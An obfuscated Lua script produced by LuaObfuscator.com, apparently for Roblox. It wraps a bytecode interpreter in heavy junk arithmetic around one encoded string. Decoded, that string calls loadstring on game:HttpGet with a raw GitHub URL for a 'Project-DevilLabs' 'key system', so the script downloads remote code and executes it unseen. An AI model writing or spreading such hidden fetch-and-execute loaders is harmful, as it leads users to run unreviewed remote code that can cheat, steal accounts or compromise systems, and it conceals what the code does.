--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then local v73=0;while true do if (v73==0) then v19=v0(v3(v20,1,1));return "";end end else local v74=0;local v75;while true do if (v74==0) then v75=v2(v0(v20,16));if v19 then local v100=v5(v75,v19);v19=nil;return v100;else return v75;end break;end end end end);local function v21(v22,v23,v24)if v24 then local v76=(v22/(((2 -1) + 1)^(v23-1)))%((601 -(259 + (1725 -(1153 + 232))))^(((v24-(1 -(0 + 0))) -(v23-(572 -(89 + 482)))) + (832 -(625 + (1949 -(1673 + 70))))));return v76-(v76%(271 -(177 + 93)));else local v77=(1 + (268 -(32 + 235)))^(v23-(1 + 0));return (((v22%(v77 + v77))>=v77) and 1) or (0 -0);end end local function v25()local v38=0;local v39;while true do if (v38==(1 + 0)) then return v39;end if ((0 + 0)==v38) then v39=v1(v16,v18,v18);v18=v18 + ((1 + 0) -0);v38=596 -(24 + 571);end end end local function v26()local v40,v41=v1(v16,v18,v18 + (984 -(208 + 774)));v18=v18 + (1581 -(1429 + 150));return (v41 * (903 -(467 + 180))) + v40;end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (1893 -(569 + 1323)) + 2);v18=v18 + 2 + 2;return (v45 * (16777577 -(253 + 108))) + (v44 * (66903 -((1853 -(675 + 351)) + 540))) + (v43 * (242 + 14)) + v42;end local function v28()local v46=0 -0;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((7 -5)==v46) then v51=v21(v48,21,16 + 15);v52=((v21(v48,21 + 11)==(1 -0)) and  -(861 -(61 + 799))) or (1185 -((1597 -(191 + 816)) + 594));v46=576 -(478 + 95);end if (v46==(134 -(39 + 92))) then if (v51==(1818 -(1309 + 509))) then if (v50==((89 + 34) -(5 + 118))) then return v52 * (1123 -(706 + 417));else local v101=1926 -(1669 + 257);while true do if (0==v101) then v51=809 -(57 + 66 + 685);v49=0 -0;break;end end end elseif (v51==(3128 -(351 + (1361 -631)))) then return ((v50==(0 + 0 + 0)) and (v52 * ((3 -2)/(0 + 0)))) or (v52 * NaN);end return v8(v52,v51-1023) * (v49 + (v50/(2^((50 + 90) -(236 -148)))));end if (v46==(1 + 0)) then v49=4 -3;v50=(v21(v48,1 -0,20) * ((145 -(92 + 39 + 12))^(38 -6))) + v47;v46=6 -4;end if (v46==(0 + 0)) then v47=v27();v48=v27();v46=2 -1;end end end local function v29(v30)local v53=0 + 0;local v54;local v55;while true do if ((1 + 0 + 0)==v53) then v54=v3(v16,v18,(v18 + v30) -(1 + (0 -0)));v18=v18 + v30;v53=2;end if (v53==(8 -(9 -4))) then return v6(v55);end if (v53==(582 -(36 + 544))) then v55={};for v81=1440 -(282 + 1157), #v54 do v55[v81]=v2(v1(v3(v54,v81,v81)));end v53=1652 -(499 + 1150);end if (v53==(964 -((1994 -1176) + 146))) then v54=nil;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v53=1;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v56~=(1932 -(1429 + 501))) then else local v78=0;while true do if ((1 + 0)==v78) then v56=1 + 2;break;end if (v78==(0 + 0)) then v61=nil;v62=nil;v78=1 -0;end end end if ((0 -0)~=v56) then else local v79=0 -0;while true do if (v79~=(692 -(75 + 616))) then else v56=557 -(318 + 238);break;end if (v79~=0) then else v57=0 + 0;v58=nil;v79=1;end end end if (v56==(3 + 0)) then v63=nil;while true do local v83=0;local v84;while true do if (v83~=(0 + 0)) then else v84=0;while true do if (v84~=(1 + 0)) then else if (v57==(0 -0)) then local v107=0 -0;local v108;local v109;while true do if (v107==(0 -0)) then v108=0;v109=nil;v107=1;end if (v107~=(436 -(419 + 16))) then else while true do if (v108==0) then v109=0 + 0;while true do if (v109~=(0 + 0)) then else local v121=148 -(131 + 17);while true do if (v121~=(4 -3)) then else v109=1246 -(606 + 639);break;end if (v121~=(0 + 0)) then else v58={};v59={};v121=1179 -(1155 + 23);end end end if (v109~=1) then else v60={};v57=1 -0;break;end end break;end end break;end end end if (v57==(1 -0)) then local v110=1358 -(958 + 400);local v111;while true do if (v110~=0) then else v111=0 -0;while true do if ((354 -(330 + 24))~=v111) then else local v119=0;while true do if (v119~=(0 + 0)) then else v61={v58,v59,nil,v60};v62=v27();v119=1935 -(1034 + 900);end if (v119==(1 -0)) then v111=3 -2;break;end end end if (v111~=(2 -1)) then else v63={};v57=1 + 1;break;end end break;end end end break;end if (v84~=(0 -0)) then else local v106=0 -0;while true do if (v106==0) then if (v57==3) then local v112=0;local v113;while true do if (v112==0) then v113=0 -0;while true do local v120=0;while true do if (v120==(0 -0)) then if (v113~=(1 + 0)) then else return v61;end if (v113==(0 + 0)) then local v140=0 + 0;while true do if (v140~=(1104 -(561 + 542))) then else v113=1;break;end if ((0 -0)==v140) then for v164=1 + 0,v27() do v59[v164-(2 -1)]=v33();end for v166=1570 -(242 + 1327),v27() do v60[v166]=v27();end v140=1 + 0;end end end break;end end end break;end end end if (v57==(2 + 0)) then local v114=0 -0;local v115;local v116;while true do if (v114~=(2 -1)) then else while true do if (v115==0) then v116=0 -0;while true do if (v116==(0 -0)) then for v148=1024 -(133 + 890),v62 do local v149=1280 -(1263 + 17);local v150;local v151;local v152;while true do if (v149==(560 -(224 + 336))) then v150=1018 -(406 + 612);v151=nil;v149=1 + 0;end if (v149==(1 + 0)) then v152=nil;while true do if (v150~=1) then else if (v151==(2 -1)) then v152=v25()~=(1263 -(1210 + 53));elseif (v151==(79 -(64 + 13))) then v152=v28();elseif (v151~=(1 + 2)) then else v152=v29();end v63[v148]=v152;break;end if (v150==(617 -(153 + 464))) then local v173=0 -0;local v174;while true do if (v173==(0 -0)) then v174=288 -(127 + 161);while true do if (v174==0) then v151=v25();v152=nil;v174=1;end if (1==v174) then v150=956 -(168 + 787);break;end end break;end end end end break;end end end v61[2 + 1]=v25();v116=1 + 0;end if (v116~=(1 + 0)) then else for v153=2 -1,v27() do local v154=0;local v155;local v156;local v157;while true do if (1==v154) then v157=nil;while true do if (v155~=1) then else while true do if (v156~=(0 -0)) then else v157=v25();if (v21(v157,1,1 + 0)~=(1984 -(1323 + 661))) then else local v177=0 -0;local v178;local v179;local v180;local v181;local v182;while true do if (v177~=(1 + 1)) then else v182=nil;while true do if (v178~=(4 -2)) then else while true do if (v179==(1865 -(587 + 1275))) then if (v21(v181,1105 -(263 + 839),3)==(1 + 0)) then v182[11 -7]=v63[v182[4 + 0]];end v58[v153]=v182;break;end if (v179==(1 + 0)) then local v187=0 -0;local v188;while true do if (v187~=0) then else v188=351 -(312 + 39);while true do if (v188==(0 -0)) then local v198=0;local v199;while true do if (v198~=(948 -(406 + 542))) then else v199=0 + 0;while true do if (v199==(0 + 0)) then v182={v26(),v26(),nil,nil};if (v180==0) then local v206=0 -0;local v207;while true do if (v206~=(0 + 0)) then else v207=0 + 0;while true do if (v207==(0 + 0)) then v182[3]=v26();v182[147 -(122 + 21)]=v26();break;end end break;end end elseif (v180==(2 -1)) then v182[33 -(20 + 10)]=v27();elseif (v180==2) then v182[2 + 1]=v27() -((4 -2)^16);elseif (v180==(268 -(31 + 234))) then local v212=0;local v213;local v214;while true do if (v212~=(81 -(9 + 72))) then else v213=0;v214=nil;v212=2 -1;end if ((665 -(255 + 409))~=v212) then else while true do if (v213==(0 -0)) then v214=0;while true do if (v214==(0 -0)) then v182[3]=v27() -(2^(408 -(161 + 231)));v182[2 + 2]=v26();break;end end break;end end break;end end end v199=2 -1;end if (v199==(2 -1)) then v188=1 + 0;break;end end break;end end end if (v188~=(1000 -(316 + 683))) then else v179=2;break;end end break;end end end if (v179==(1 + 1)) then local v189=0 + 0;local v190;while true do if (v189==(87 -(52 + 35))) then v190=276 -(108 + 168);while true do if (v190~=(0 -0)) then else local v200=0 -0;while true do if (v200~=(2 -1)) then else v190=1257 -(343 + 913);break;end if (0~=v200) then else if (v21(v181,1 + 0,2 -1)==(1 + 0)) then v182[2]=v63[v182[4 -2]];end if (v21(v181,1837 -(154 + 1681),2 + 0)==(1 + 0)) then v182[6 -3]=v63[v182[7 -4]];end v200=1;end end end if (v190==1) then v179=3;break;end end break;end end end if (v179~=0) then else local v191=1916 -(143 + 1773);local v192;local v193;while true do if (v191~=(275 -(176 + 98))) then else while true do if (v192==0) then v193=0 -0;while true do if (v193~=(0 + 0)) then else local v201=0;while true do if (v201~=0) then else v180=v21(v157,7 -5,4 -1);v181=v21(v157,4,5 + 1);v201=1 -0;end if (v201==(1 + 0)) then v193=1 + 0;break;end end end if (v193~=(538 -(486 + 51))) then else v179=2 -1;break;end end break;end end break;end if (v191==0) then v192=202 -(37 + 165);v193=nil;v191=1 + 0;end end end end break;end if (v178==1) then local v183=0 + 0;while true do if (v183~=(0 -0)) then else local v194=0 -0;while true do if (v194==(1 + 0)) then v183=1915 -(576 + 1338);break;end if ((0 + 0)~=v194) then else v181=nil;v182=nil;v194=1 + 0;end end end if (v183~=(477 -(243 + 233))) then else v178=2;break;end end end if (v178==0) then local v184=0 -0;local v185;while true do if (v184~=(0 -0)) then else v185=796 -(595 + 201);while true do if (v185==1) then v178=1;break;end if (v185==(976 -(258 + 718))) then local v197=0;while true do if (v197~=0) then else v179=0 -0;v180=nil;v197=3 -2;end if (v197==(3 -2)) then v185=1;break;end end end end break;end end end end break;end if (v177~=(0 + 0)) then else v178=1591 -(870 + 721);v179=nil;v177=3 -2;end if (v177==(3 -2)) then v180=nil;v181=nil;v177=235 -(30 + 203);end end end break;end end break;end if (v155==0) then v156=0 + 0;v157=nil;v155=1 -0;end end break;end if (v154~=0) then else v155=217 -(99 + 118);v156=nil;v154=1965 -(1538 + 426);end end end v57=6 -3;break;end end break;end end break;end if (v114==(0 -0)) then v115=1635 -(1501 + 134);v116=nil;v114=1 -0;end end end v106=1;end if (v106~=1) then else v84=1;break;end end end end break;end end end break;end if (v56~=(1 + 0)) then else local v80=0 + 0;while true do if (v80~=(862 -(458 + 403))) then else v56=1 + 1;break;end if ((0 + 0)==v80) then v59=nil;v60=nil;v80=1;end end end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v67=0;local v68;local v69;local v70;local v71;local v72;while true do if (v67==3) then A,B=v32(v11(v72));if  not A[1] then local v95=v35[4][v68] or "?";error("Script error at ["   .. v95   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (v67==0) then v68=1;v69= -1;v67=1;end if (v67==1) then v70={...};v71=v12("#",...) -1;v67=2;end if (v67==2) then v72=nil;v72=function()local v85=v64;local v86=v65;local v87=v66;local v88=v32;local v89={};local v90={};local v91={};for v96=(0 -0) + 0,v71 do if ((v96>=v87) or (2525==(6279 -(709 + 774)))) then v89[v96-v87]=v70[v96 + (1086 -(64 + 693 + 328))];else v91[v96]=v70[v96 + (2 -1)];end end local v92=(v71-v87) + 1 + 0;local v93;local v94;while true do local v97=1275 -(424 + 851);local v98;local v99;while true do if ((2858>=(647 -428)) and ((0 -0)==v97)) then v98=(7320 -5610) -(437 + 1273);v99=nil;v97=40 -(38 + 1);end if (((1722 -(2553 -1962))<=(1604 + 975)) and (v97==(1 -0))) then while true do if ((v98==((2179 -364) -(922 + 893))) or (((13497 -6017) -2941)<1327)) then v99=0;while true do if (((15155 -10811)==(4483 -(96 + 43))) and (v99==(0 + 0))) then local v117=0 + 0;local v118;while true do if (((446 -(190 + 242))<=(51 + 269)) and (v117==(0 + 0))) then v118=0 + (1634 -(1490 + 144));while true do if ((v118==((1703 -(270 + 1431)) -1)) or ((556 + 1219)<((5699 -(972 + 1010)) -2166))) then v99=1;break;end if (((1171 -(134 + 412))<(181 + 3047)) and (v118==(0 -0))) then local v122=0;while true do if ((v122==(0 + 0)) or ((3387 -2000)>(526 + 987))) then v93=v85[v68];v94=v93[1 + 0];v122=1 + 0;end if ((v122==(4 -3)) or ((4200 -(102 + 416))>(14347 -10368))) then v118=1 + (0 -0);break;end end end end break;end end end if ((v99==1) or ((5811 -(489 + (1018 -(41 + 180))))<=(4616 -((1882 -(1025 + 771)) + 459)))) then if (((53 + 161)<=(472 + 2029)) and (v94<=3)) then if ((v94<=(766 -((170 -109) + 704))) or ((596 + 2696)<2111)) then if ((v94>(0 + 0)) or ((782 + 2338)<=(1806 -471))) then do return;end else v91[v93[2]]=v93[1994 -(927 + 1064)];end elseif ((v94>2) or ((3480 -(369 + 130))<=1585)) then local v125=1889 -(436 + 1453);local v126;local v127;local v128;local v129;local v130;while true do if ((v125==(2 + 0)) or ((2635 + 890)>(15184 -11297))) then v130=nil;while true do if ((v126==1) or ((775 -(73 + 24))<=69)) then local v158=(2321 -(474 + 1465)) -(20 + 273 + 89);while true do if ((v158==0) or ((774 + 1794)>(10092 -7013))) then v69=(v129 + v127) -(394 -(98 + 295));v130=595 -(281 + 314);v158=1096 -(338 + 757);end if ((3819==(1358 + 2461)) and (v158==(1 + 0))) then v126=205 -(165 + 38);break;end end end if ((((3461 + 903) -(6 + 1639))<4462) and (v126==(0 -0))) then local v159=1546 -(937 + 609);while true do if ((v159==(2 -1)) or ((4240 -(1184 + 624))>=4821)) then v126=1;break;end if (((773 + 4077)>=(371 + 2446)) and (v159==(0 -0))) then v127=v93[2 + 0];v128,v129=v88(v91[v127](v13(v91,v127 + 1 + 0,v93[3 + 0])));v159=1 + 0;end end end if ((v126==2) or ((19004 -14307)==(5613 -2947))) then for v168=v127,v69 do local v169=0;local v170;while true do if (((0 + 0)==v169) or (3142<=(298 -73))) then v170=0 -0;while true do if (((1860 + 1177)<(3580 -(109 + (1797 -(344 + 1071))))) and (v170==(1590 -(1023 + 293 + 274)))) then v130=v130 + 1;v91[v168]=v128[v130];break;end end break;end end end break;end end break;end if ((v125==(0 + (1561 -(215 + 1346)))) or ((11343 -6749)<(1931 -(1554 + 193)))) then v126=0 -0;v127=nil;v125=776 -(18 + 757);end if ((v125==(4 -3)) or ((4695 -(854 + 873))<(2222 -(55 + (1624 -(1031 + 172)))))) then v128=nil;v129=nil;v125=382 -(142 + 238);end end else local v131=0;local v132;local v133;while true do if (((11248 -6264)>1535) and (v131==((3 -2) -0))) then v91[v132 + ((1049 -(54 + 992)) -2)]=v133;v91[v132]=v133[v93[4]];break;end if ((v131==(1305 -(293 + 1012))) or ((574 -290)>(16332 -12206))) then local v147=0;while true do if ((v147==(1633 -(790 + 842))) or ((5704 -((1957 -(1205 + 313)) + 425))<3728)) then v131=1389 -((925 -508) + 971);break;end if ((2637>=((9053 -5684) -2223)) and (v147==(0 + 0))) then v132=v93[2 + (237 -(27 + 210))];v133=v91[v93[271 -(129 + (347 -(75 + 133)))]];v147=1 + 0;end end end end end elseif (((1254 + 1598)<(2724 + 734)) and (v94<=(1653 -(484 + 1164)))) then if (((299 + 816)==(611 + 504)) and (v94==(1 + 3))) then v91[v93[2]]=v37[v93[11 -8]];else v91[v93[2 + (0 -0)]]=v93[3 + 0]~=(38 -(33 + 5));end elseif (((157 + 718)>(2348 -1772)) and (v94==(615 -(175 + 434)))) then local v137=0;local v138;local v139;while true do if ((v137==(1 + 0)) or ((5506 -(3695 -(57 + 169)))<(2748 -1436))) then while true do if ((v138==(0 -0)) or (245>=(3801 -(1134 + (1925 -1254))))) then v139=v93[5 -3];v91[v139]=v91[v139](v13(v91,v139 + 1,v69));break;end end break;end if ((v137==(483 -(81 + 402))) or (((43081 -30934) -9350)>=4487)) then v138=0 + 0;v139=nil;v137=(3446 -1967) -(96 + 1382);end end else v91[v93[4 -2]]();end v68=v68 + (1379 -(9 + 1167 + 202));break;end end break;end end break;end end end end;v67=3;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4461726B6573746C6567656E64732F50726F6A6563742D446576696C4C6162732F6D61696E2F6B657925323073797374656D00093O0012043O00013O001204000100023O00200200010001000300122O000300044O0005000400014O0003000100044O00065O00022O00073O000100012O00013O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
